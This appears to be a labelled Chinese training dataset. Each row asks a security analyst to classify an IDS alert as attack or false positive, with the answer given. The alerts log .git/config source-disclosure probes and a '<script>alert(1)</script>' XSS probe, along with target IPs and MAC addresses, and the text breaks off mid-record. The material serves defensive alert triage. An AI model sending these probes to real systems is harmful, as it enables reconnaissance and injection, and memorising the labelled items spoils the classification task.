"R0VUIC9zZXJ2ZXIvLmdpdC9jb25maWcgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS4xMg0KVXNlci1BZ2VudDogbDlleHBsb3JlLzEuMi4yDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkNvbm5lY3Rpb246IGNsb3NlDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.12", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.12/server/.git/config", "first_access_time": "2024-11-27 01:08:03", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "瑞士--苏黎世州--苏黎世", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.23.64.208", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "856a14beadcbe0caf5f528a05fae3d54", "proto": "http", "xff": "", "alarm_id": "20241127_12c90390b16fa123b9b9e00e10d81ae9", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 01:08:03", "attack_addr": "瑞士--苏黎世州--苏黎世(47.361221/8.545878)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732640862", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "179.43.163.250", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/server/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "15", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/server/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x100012b2", "req_header": "GET /server/.git/config HTTP/1.1\r\nHost: 218.76.15.12\r\nUser-Agent: l9explore/1.2.2\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "179.43.163.250", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "8b2f76fd124ba4f8b9f28987a4504f66", "sport": "43004", "h_url": "/server/.git/config", "accept-encoding": "gzip", "user-agent": "l9explore/1.2.2"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732638054", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732638054, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "179.43.152.10", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 36518}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE3DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCBpNjg2KSBBcHBsZVdlYktpdC81MzUuMiAoS0hUTUwsIGxpa2UgR2Vja28pIFVidW50dS8xMS4xMCBDaHJvbWl1bS8xNS4wLjg3NC4xMjAgQ2hyb21lLzE1LjAuODc0LjEyMCBTYWZhcmkvNTM1LjINCkFjY2VwdC1DaGFyc2V0OiB1dGYtOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.17", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.17/.git/config", "first_access_time": "2024-11-27 00:20:54", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "瑞士--苏黎世州--苏黎世", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "23b2d2db3ec127eeb08319965c99b2f5", "proto": "http", "xff": "", "alarm_id": "20241127_0a0f9fc8ee82ad1d0da74a58d983e96b", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 00:20:54", "attack_addr": "瑞士--苏黎世州--苏黎世(47.361221/8.545878)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732638033", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "179.43.152.10", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.17\r\nUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "179.43.152.10", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Ubuntu/11.10\", \"software\": \"Chromium/15.0.874\", \"hw_type\": \"PC\"}}", "host_md5": "8e92c0757fd0b686d9fd85100838e2b6", "sport": "36518", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637993", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.64.208", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637993, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.64.208", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "179.43.152.10", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 58414}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjEyDQpVc2VyLUFnZW50OiBBdmFudCBCcm93c2VyLzEuMi43ODlyZWwxIChodHRwOi8vd3d3LmF2YW50YnJvd3Nlci5jb20pDQpBY2NlcHQtQ2hhcnNldDogdXRmLTgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KQ29ubmVjdGlvbjogY2xvc2UNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.12", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.12/.git/config", "first_access_time": "2024-11-27 00:19:53", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "瑞士--苏黎世州--苏黎世", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.23.64.208", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "e11823323c028cbf91348e76e1864407", "proto": "http", "xff": "", "alarm_id": "20241127_7cf1eed9da2a56a5b02bbe1195f9948a", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 00:19:53", "attack_addr": "瑞士--苏黎世州--苏黎世(47.361221/8.545878)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637972", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "179.43.152.10", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.12\r\nUser-Agent: Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "179.43.152.10", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"software\": \"Avant/1\", \"hw_type\": \"PC\"}}", "host_md5": "8b2f76fd124ba4f8b9f28987a4504f66", "sport": "58414", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637993", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637993, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "179.43.152.10", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 52446}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjEwDQpVc2VyLUFnZW50OiBPcGVyYS85LjgwIChKMk1FL01JRFA7IE9wZXJhIE1pbmkvNS4wLjE2ODIzLzE0Mjg7IFU7IGVuKSBQcmVzdG8vMi4yLjANCkFjY2VwdC1DaGFyc2V0OiB1dGYtOA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.10", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.10/.git/config", "first_access_time": "2024-11-27 00:19:53", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "瑞士--苏黎世州--苏黎世", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "f3cf43bd514fc44d976e8454b22207bb", "proto": "http", "xff": "", "alarm_id": "20241127_efdc5440ff7816fd64a50e8d2a49f32e", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 00:19:53", "attack_addr": "瑞士--苏黎世州--苏黎世(47.361221/8.545878)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637972", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "179.43.152.10", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.10\r\nUser-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "179.43.152.10", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Generic/Generic Feature Phone\", \"software\": \"Opera Mini/5.0.16823\", \"hw_type\": \"PC\"}}", "host_md5": "261f45f0acd69bc44c8fdeed8c4281bc", "sport": "52446", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637932", "vlan_id": "", "vuln_type": "GIT项目源代码探测", "rule_version_str": "3.0.1122.14572", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.222", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637932, "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.222", "site_app": "其他", "hit_end": 8, "uri": "/.git/config", "dport": 80, "vuln_name": "GIT项目源代码探测", "rsp_status": 0, "code_language": "其他", "solution": "在发布web前,移除.git目录。", "hit_start": 0, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "xff": "", "sip": "179.43.152.10", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "public_date": "2017-05-22 15:55:40", "sport": 46254}, "solution": "在发布web前,移除.git目录。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC8uZ2l0L2NvbmZpZyBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE2DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNF82KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzkuMC4zOTQ1LjEzMCBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtQ2hhcnNldDogdXRmLTgNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KQ29ubmVjdGlvbjogY2xvc2UNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "file_md5": "", "host": "218.76.15.16", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.16/.git/config", "first_access_time": "2024-11-27 00:18:52", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "瑞士--苏黎世州--苏黎世", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "GIT项目源代码探测", "alarm_sip": "172.31.193.222", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "87f92afed694a77d8712d439ddac3dc6", "proto": "http", "xff": "", "alarm_id": "20241127_1bb41682b2457cc589866d65e612c992", "vuln_desc": "Git是一款免费、开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。 当部署web应用时,网站管理员将git项目下的.git目录拷贝到web目录,黑客通过解压.git\\objects\\pack目录下的文件,达到还原源代码的目的。", "attack_chain": "0x01020000", "access_time": "2024-11-27 00:18:52", "attack_addr": "瑞士--苏黎世州--苏黎世(47.361221/8.545878)", "type_chain": "16160000", "vuln_harm": "攻击者可利用此类攻击进行信息收集,以实施进一步攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732637911", "code_language": "其他", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "179.43.152.10", "public_date": "2017-05-22 15:55:40", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/.git/config", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "其他", "super_attack_chain": "0x01000000", "hit_end": "8", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/.git/config", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "accept-charset": "utf-8", "rule_id": "0x100012b2", "req_header": "GET /.git/config HTTP/1.1\r\nHost: 218.76.15.16\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\r\nAccept-Charset: utf-8\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "179.43.152.10", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440242-GIT项目源代码探测", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.14\", \"software\": \"Chrome/79.0.3945\", \"hw_type\": \"PC\"}}", "host_md5": "5704a8d93ab5f08f2d5f86217a1377f4", "sport": "46254", "h_url": "/.git/config", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732637301", "vlan_id": "", "vuln_type": "发现跨站脚本绕过攻击(XSS)", "rule_version_str": "3.0.1122.14572", "attack_type": "跨站脚本攻击(XSS)", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "跨站脚本攻击(XSS)", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732637301, "vuln_harm": "目标存在跨站脚本绕过攻击。 1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页中的恶意代码就会被执行,一般用来盗取浏览器cookie。 2.跨站脚本攻击漏洞,英文名称CrossSiteScripting,简称CSS又叫XSS。它指的是恶意攻击者向Web页面中插入一段恶意代码,当用户浏览该页面时,嵌入到Web页面中的恶意代码就会被执行,从而达到恶意攻击者的特殊目的。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 30, "uri": "/?search=<script>alert(1)</script>", "dport": 80, "vuln_name": "发现跨站脚本绕过攻击(XSS)", "rsp_status": 0, "code_language": "", "solution": "方案一:避免XSS的方法之一主要是将用户所提供的内容输入输出进行过滤,许多语言都有提供对HTML的过滤:可以利用下面这些函数对出现xss漏洞的参数进行过滤PHP的htmlentities()或是htmlspecialchars()。Python的cgi.escape()。ASP的Server.HTMLEncode()。ASP.NET的Server.HtmlEncode()或功能更强的MicrosoftAnti-CrossSiteScriptingLibraryJava的xssprotect(OpenSourceLibrary)。Node.js的node-validator。\r\n\r\n方案二:使用开源的漏洞防护插件。", "hit_start": 10, "detail_info": "跨站脚本绕过攻击,攻击者对payload进行了编码处理,如将payload转换成八进制、十六进制、unicode等格式。", "xff": "", "sip": "124.239.114.146", "vuln_desc": "跨站脚本绕过攻击,攻击者对payload进行了编码处理,如将payload转换成八进制、十六进制、unicode等格式。", "public_date": "2023-08-02 18:16:19", "sport": 8213}, "solution": "方案一:避免XSS的方法之一主要是将用户所提供的内容输入输出进行过滤,许多语言都有提供对HTML的过滤:可以利用下面这些函数对出现xss漏洞的参数进行过滤PHP的htmlentities()或是htmlspecialchars()。Python的cgi.escape()。ASP的Server.HTMLEncode()。ASP.NET的Server.HtmlEncode()或功能更强的MicrosoftAnti-CrossSiteScriptingLibraryJava的xssprotect(OpenSourceLibrary)。Node.js的node-validator。\r\n\r\n方案二:使用开源的漏洞防护插件。", "hit_start": "10", "skyeye_id": "", "payload": {"req_header": "R0VUIC8/c2VhcmNoPTxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4gSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZSxicg0KVXNlci1BZ2VudDogVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDUuMTsgMzYwU0UpDQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KQ29ubmVjdGlvbjogS2VlcC1hbGl2ZQ0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "跨站脚本绕过攻击,攻击者对payload进行了编码处理,如将payload转换成八进制、十六进制、unicode等格式。", "file_md5": "", "host": "www.hn.sgcc.cn", "host_state": "失败", "rule_key": "webids", "connection": "Keep-alive", "api": "www.hn.sgcc.cn/", "first_access_time": "2024-11-27 00:08:21", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--河北省--衡水市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现跨站脚本绕过攻击(XSS)", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "2840d0ac9fccb2e1a8bba1f87f747597", "proto": "http", "xff": "", "alarm_id": "20241127_b0ac3a1e89fe4101cc155e046b055817", "vuln_desc": "跨站脚本绕过攻击,攻击者对payload进行了编码处理,如将payload转换成八进制、十六进制、unicode等格式。", "attack_chain": "0x02020000", "access_time": "2024-11-27 00:08:21", "attack_addr": "中国--河北省--衡水市(37.739933/115.673946)", "type_chain": "16050000", "vuln_harm": "目标存在跨站脚本绕过攻击。 